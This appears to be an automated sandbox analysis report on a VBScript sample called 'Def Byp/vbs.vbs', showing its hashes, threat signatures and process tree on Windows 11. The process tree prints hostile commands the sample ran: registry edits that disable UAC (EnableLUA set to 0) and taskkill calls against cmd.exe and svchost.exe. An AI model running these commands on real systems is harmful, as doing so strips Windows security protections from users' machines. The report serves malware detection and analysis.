Overview

overview

10

Static

static

1

Def Byp/vbs.vbs

windows11-21h2-x64

10

Analysis

  • max time kernel
    20s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240412-en
  • resource tags

    arch:x64arch:x86image:win11-20240412-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    16/04/2024, 01:10

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    Def Byp/vbs.vbs

  • Size

    1KB

  • MD5

    8fc69337ab4bbb5ffa1ae6bce6be8b63

  • SHA1

    826a48936ab1d485d28eb2db4401502e4d0e8891

  • SHA256

    517e1a63494abb3a33c37dd5a68caa36b44a8a3c18e8729d06d6f81dda3f11c4

  • SHA512

    ed832c83972a451392fbf9f59468d64dd2e1ae11d026dbb4346b4ca15c5dc1f11df939c769f10c72a09a78866256da0ff9c4578f6bef1cd374db029342056c65

Score
10/10
evasiontrojan

Malware Config

Signatures

  • UAC bypass 3 TTPs 2 IoCs
    evasiontrojan
  • Disables Task Manager via registry modification
    evasion
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 3 IoCs
    evasion
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Def Byp\vbs.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4256
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5024
      • C:\Windows\System32\reg.exe
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • UAC bypass
        • Modifies registry key
        PID:1696
    • C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" DELETE "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v ABC_DEF /f
      2⤵
        PID:3532
      • C:\Windows\System32\wscript.exe
        "C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\Def Byp\vbs.vbs" uac
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1212
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /k C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4640
          • C:\Windows\System32\reg.exe
            C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
            4⤵
            • UAC bypass
            • Modifies registry key
            PID:4924
        • C:\Windows\System32\reg.exe
          "C:\Windows\System32\reg.exe" DELETE "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v ABC_DEF /f
          3⤵
            PID:2996
          • C:\Windows\System32\taskkill.exe
            "C:\Windows\System32\taskkill.exe" /f /im cmd.exe
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4576
        • C:\Windows\System32\taskkill.exe
          "C:\Windows\System32\taskkill.exe" /f /im cmd.exe
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1520
        • C:\Windows\System32\taskkill.exe
          "C:\Windows\System32\taskkill.exe" /f /im svchost.exe
          2⤵
          • Kills process with taskkill
          PID:3548

      Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads